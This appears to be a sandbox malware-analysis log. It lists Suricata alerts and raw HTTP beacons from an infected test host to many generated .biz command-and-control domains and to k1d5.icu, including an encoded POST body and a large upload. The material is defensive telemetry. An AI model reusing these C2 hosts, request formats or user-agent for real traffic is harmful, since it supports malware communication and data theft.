Source: Joe Sandbox View | IP Address: 13.248.148.254
Source: Joe Sandbox View | IP Address: 3.254.94.185
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.9:49709
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.9:49709
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.9:49710
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.9:49710
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.9:49713
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.9:49713
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.9:49759
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.9:49759
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.9:49744
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.9:49744
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.9:49754
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.9:49754
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.9:49772
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.9:49772
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.9:49770
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.9:49760
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.9:49760
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.9:49770
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.9:49797
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.9:49797
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.9:49789
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.9:49789
Source: global traffic | HTTP traffic detected: POST /TP341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: k1d5.icuContent-Length: 101Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6c ea 26 66 97 46 14 e8 40 10 8b 31 11 8b 30 66 ef 47 11 8b 30 65 8b 30 63 8b 30 65 8b 30 60 8b 31 11 8b 30 66 e8 26 66 99 26 66 98 26 66 9a 46 70 9d 3b 17 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410l&fF@10fG0e0c0e0`10f&f&f&fFp;
Source: global traffic | HTTP traffic detected: POST /pj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: POST /pipasemmaulffaco HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: POST /iqhmiklhuwbcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /jwaobwjsxgqjxsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: POST /krqescexcxjlmqje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /jakwogupdhlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: POST /fmwgjkn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /cygwkoswoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: GET /cygwkoswoy?usid=18&utid=30152678086 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic | HTTP traffic detected: POST /exyejkfqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: POST /gedtsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: GET /b?usid=18&utid=30152678348 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic | HTTP traffic detected: POST /TP341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: k1d5.icuContent-Length: 42988Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /iqbvkcsnipxly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: GET /gedtsq?usid=18&utid=30152678479 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic | HTTP traffic detected: POST /en HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: GET /en?usid=18&utid=30152678739 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic | HTTP traffic detected: POST /wt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic | HTTP traffic detected: POST /xfhngbevi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /aopfhnckuovs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /reeuv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /fkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /mtrjsdrytjxvslm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /dnmpvtql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /lljqple HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /yxchsqwoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /eyajoanbw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /wgmealrwqlbauh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: POST /yhikx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: GET /yhikx?usid=18&utid=30152687280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic | HTTP traffic detected: POST /xrkixnpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic | HTTP traffic detected: GET /xrkixnpk?usid=18&utid=30152687444 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
              Source: global trafficHTTP traffic detected: POST /rrvggovttpevpbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ljnlowt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ayiycmrfnan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kqipv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tpyri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kkcqqeuyeyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vipn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xtqnbvhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /if HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /seueafvlbcmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vqrfhgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jqlotfcyykbfgsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cuxawpwbnkhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jttp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wpnrqhmpnuisgi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xhfpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /llkyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /edke HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gtvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kfeqymn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
